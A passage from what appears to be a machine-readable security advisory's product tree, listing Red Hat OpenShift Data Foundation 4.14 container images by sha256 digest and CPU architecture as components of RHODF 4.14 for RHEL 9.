"odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le", }, product_reference: "odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64", }, product_reference: "odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le", }, product_reference: "odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x", }, product_reference: "odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64", }, product_reference: "odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x", }, product_reference: "odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64", }, product_reference: "odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64", }, product_reference: "odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le", }, product_reference: "odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le", }, product_reference: "odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64", }, product_reference: "odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x", }, product_reference: "odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x", }, product_reference: "odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64", }, product_reference: "odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le", }, product_reference: "odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x", }, product_reference: "odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le", }, product_reference: "odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64", }, product_reference: "odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le", }, product_reference: "odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64", }, product_reference: "odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64", }, product_reference: "odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x", }, product_reference: "odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64", }, product_reference: "odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64", }, product_reference: "odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x", }, product_reference: "odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le", }, product_reference: "odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64", }, product_reference: "odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le", }, product_reference: "odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x", }, product_reference: "odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64", }, product_reference: "odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x", }, product_reference: "odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le", }, product_reference: "odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le", }, product_reference: "odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x", }, product_reference: "odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64", }, product_reference: "odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64", }, product_reference: "odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64", }, product_reference: "odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64", }, product_reference: "odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le", }, product_reference: "odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x", }, product_reference: "odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le", }, product_reference: "odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64", }, product_reference: "odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x", }, product_reference: "odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64", }, product_reference: "odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x", }, product_reference: "odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le", }, product_reference: "odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64", }, product_reference: "odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x", }, product_reference: "odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64", }, product_reference: "odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le as a component of RHODF 4.14 for RHEL 9", product_id: 